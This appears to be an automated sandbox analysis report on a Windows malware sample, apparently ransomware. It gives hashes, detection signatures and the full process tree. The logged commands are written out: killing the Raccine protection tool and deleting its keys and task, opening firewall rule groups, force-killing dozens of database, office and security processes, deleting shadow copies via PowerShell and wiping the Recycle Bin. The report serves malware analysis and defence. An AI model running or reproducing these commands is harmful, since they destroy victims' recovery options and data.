Resubmissions

07-06-2021 10:08

210607-9hpr7n82ba 10

03-06-2021 20:20

210603-mpsat3rm4j 10

Analysis

  • max time kernel
    28s
  • max time network
    62s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    07-06-2021 10:08

General

  • Target

    gVcWDWENI8.exe

  • Size

    142KB

  • MD5

    e1f063d63a75e0e0e864052b1a50ab06

  • SHA1

    75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7

  • SHA256

    8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7

  • SHA512

    25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3

Score
8/10

Malware Config

Signatures

  • Modifies Windows Firewall 1 TTPs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe
    "C:\Users\Admin\AppData\Local\Temp\gVcWDWENI8.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1072
    • C:\Windows\system32\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:524
    • C:\Windows\system32\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:572
      • C:\Windows\system32\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:1472
      • C:\Windows\system32\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1956
        • C:\Windows\system32\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:300
          • C:\Windows\system32\sc.exe
            "sc.exe" config FDResPub start= auto
            2⤵
              PID:644
            • C:\Windows\system32\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:1184
              • C:\Windows\system32\netsh.exe
                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                2⤵
                  PID:596
                • C:\Windows\system32\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:1912
                  • C:\Windows\system32\sc.exe
                    "sc.exe" config SSDPSRV start= auto
                    2⤵
                      PID:1144
                    • C:\Windows\system32\sc.exe
                      "sc.exe" config SQLWriter start= disabled
                      2⤵
                        PID:752
                      • C:\Windows\system32\sc.exe
                        "sc.exe" config upnphost start= auto
                        2⤵
                          PID:1632
                        • C:\Windows\system32\sc.exe
                          "sc.exe" config SstpSvc start= disabled
                          2⤵
                            PID:268
                          • C:\Windows\system32\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                            2⤵
                              PID:328
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM mspub.exe /F
                              2⤵
                              • Kills process with taskkill
                              PID:1480
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM synctime.exe /F
                              2⤵
                              • Kills process with taskkill
                              PID:1248
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM mspub.exe /F
                              2⤵
                              • Kills process with taskkill
                              PID:600
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM mydesktopqos.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1436
                            • C:\Windows\system32\taskkill.exe
                              "taskkill.exe" /IM Ntrtscan.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:532
                            • C:\Windows\system32\arp.exe
                              "arp" -a
                              2⤵
                                PID:1220
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mysqld.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:892
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM isqlplussvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1160
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:536
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqbcoreservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1732
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM firefoxconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1752
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM onenote.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:800
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM encsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:268
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM PccNTMon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1144
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM agntsvc.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1912
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM msaccess.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:960
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM excel.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1824
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM thebat.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1564
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM CNTAoSMgr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1176
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM steam.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:768
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM outlook.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1300
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM tmlisten.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:956
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlwriter.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1432
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM tbirdconfig.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:600
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM msftesql.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2044
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM dbsnmp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1052
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM powerpnt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1808
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM dbeng50.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:760
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM xfssvccon.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1956
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM thebat64.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:644
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopqos.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1476
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM visio.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1596
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM wordpad.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:864
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocomm.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1688
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mydesktopservice.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1248
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM infopath.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1552
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mysqld-opt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1680
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM winword.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1864
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocautoupds.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1484
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mbamtray.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1368
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM mysqld-nt.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:620
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM zoolz.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1848
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM ocssd.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1076
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM oracle.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:328
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" IM thunderbird.exe /F
                                2⤵
                                • Kills process with taskkill
                                PID:924
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlagent.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:824
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlbrowser.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1768
                              • C:\Windows\system32\taskkill.exe
                                "taskkill.exe" /IM sqlservr.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:900
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                2⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:980
                              • C:\Windows\system32\cmd.exe
                                "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                2⤵
                                  PID:1704
                              • C:\Windows\system32\conhost.exe
                                \??\C:\Windows\system32\conhost.exe "-865606552271263082974438388-871688277-446176315-1083529819195851946-1444366919"
                                1⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1480

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/268-75-0x0000000000000000-mapping.dmp

                              • memory/268-92-0x0000000000000000-mapping.dmp

                              • memory/300-66-0x0000000000000000-mapping.dmp

                              • memory/328-121-0x0000000000000000-mapping.dmp

                              • memory/328-76-0x0000000000000000-mapping.dmp

                              • memory/524-62-0x0000000000000000-mapping.dmp

                              • memory/532-82-0x0000000000000000-mapping.dmp

                              • memory/536-86-0x0000000000000000-mapping.dmp

                              • memory/572-63-0x0000000000000000-mapping.dmp

                              • memory/596-72-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

                                Filesize

                                8KB

                              • memory/596-69-0x0000000000000000-mapping.dmp

                              • memory/600-101-0x0000000000000000-mapping.dmp

                              • memory/600-79-0x0000000000000000-mapping.dmp

                              • memory/620-118-0x0000000000000000-mapping.dmp

                              • memory/644-68-0x0000000000000000-mapping.dmp

                              • memory/644-108-0x0000000000000000-mapping.dmp

                              • memory/752-73-0x0000000000000000-mapping.dmp

                              • memory/760-104-0x0000000000000000-mapping.dmp

                              • memory/768-97-0x0000000000000000-mapping.dmp

                              • memory/800-89-0x0000000000000000-mapping.dmp

                              • memory/824-123-0x0000000000000000-mapping.dmp

                              • memory/864-110-0x0000000000000000-mapping.dmp

                              • memory/892-84-0x0000000000000000-mapping.dmp

                              • memory/900-125-0x0000000000000000-mapping.dmp

                              • memory/924-122-0x0000000000000000-mapping.dmp

                              • memory/956-99-0x0000000000000000-mapping.dmp

                              • memory/960-94-0x0000000000000000-mapping.dmp

                              • memory/980-130-0x000000001AAD0000-0x000000001AAD2000-memory.dmp

                                Filesize

                                8KB

                              • memory/980-132-0x00000000023F0000-0x00000000023F1000-memory.dmp

                                Filesize

                                4KB

                              • memory/980-133-0x0000000002570000-0x0000000002571000-memory.dmp

                                Filesize

                                4KB

                              • memory/980-131-0x000000001AAD4000-0x000000001AAD6000-memory.dmp

                                Filesize

                                8KB

                              • memory/980-126-0x0000000000000000-mapping.dmp

                              • memory/980-128-0x00000000024A0000-0x00000000024A1000-memory.dmp

                                Filesize

                                4KB

                              • memory/980-129-0x000000001AB50000-0x000000001AB51000-memory.dmp

                                Filesize

                                4KB

                              • memory/1052-103-0x0000000000000000-mapping.dmp

                              • memory/1072-59-0x0000000000B40000-0x0000000000B41000-memory.dmp

                                Filesize

                                4KB

                              • memory/1072-61-0x000000001B010000-0x000000001B012000-memory.dmp

                                Filesize

                                8KB

                              • memory/1076-120-0x0000000000000000-mapping.dmp

                              • memory/1144-71-0x0000000000000000-mapping.dmp

                              • memory/1144-91-0x0000000000000000-mapping.dmp

                              • memory/1160-85-0x0000000000000000-mapping.dmp

                              • memory/1176-96-0x0000000000000000-mapping.dmp

                              • memory/1184-67-0x0000000000000000-mapping.dmp

                              • memory/1220-83-0x0000000000000000-mapping.dmp

                              • memory/1248-112-0x0000000000000000-mapping.dmp

                              • memory/1248-78-0x0000000000000000-mapping.dmp

                              • memory/1300-98-0x0000000000000000-mapping.dmp

                              • memory/1368-116-0x0000000000000000-mapping.dmp

                              • memory/1432-100-0x0000000000000000-mapping.dmp

                              • memory/1436-81-0x0000000000000000-mapping.dmp

                              • memory/1472-64-0x0000000000000000-mapping.dmp

                              • memory/1476-107-0x0000000000000000-mapping.dmp

                              • memory/1480-77-0x0000000000000000-mapping.dmp

                              • memory/1484-117-0x0000000000000000-mapping.dmp

                              • memory/1552-113-0x0000000000000000-mapping.dmp

                              • memory/1564-93-0x0000000000000000-mapping.dmp

                              • memory/1596-109-0x0000000000000000-mapping.dmp

                              • memory/1632-74-0x0000000000000000-mapping.dmp

                              • memory/1680-114-0x0000000000000000-mapping.dmp

                              • memory/1688-111-0x0000000000000000-mapping.dmp

                              • memory/1704-134-0x0000000000000000-mapping.dmp

                              • memory/1732-87-0x0000000000000000-mapping.dmp

                              • memory/1752-88-0x0000000000000000-mapping.dmp

                              • memory/1768-124-0x0000000000000000-mapping.dmp

                              • memory/1808-105-0x0000000000000000-mapping.dmp

                              • memory/1824-95-0x0000000000000000-mapping.dmp

                              • memory/1848-119-0x0000000000000000-mapping.dmp

                              • memory/1864-115-0x0000000000000000-mapping.dmp

                              • memory/1912-70-0x0000000000000000-mapping.dmp

                              • memory/1912-90-0x0000000000000000-mapping.dmp

                              • memory/1956-106-0x0000000000000000-mapping.dmp

                              • memory/1956-65-0x0000000000000000-mapping.dmp

                              • memory/2044-102-0x0000000000000000-mapping.dmp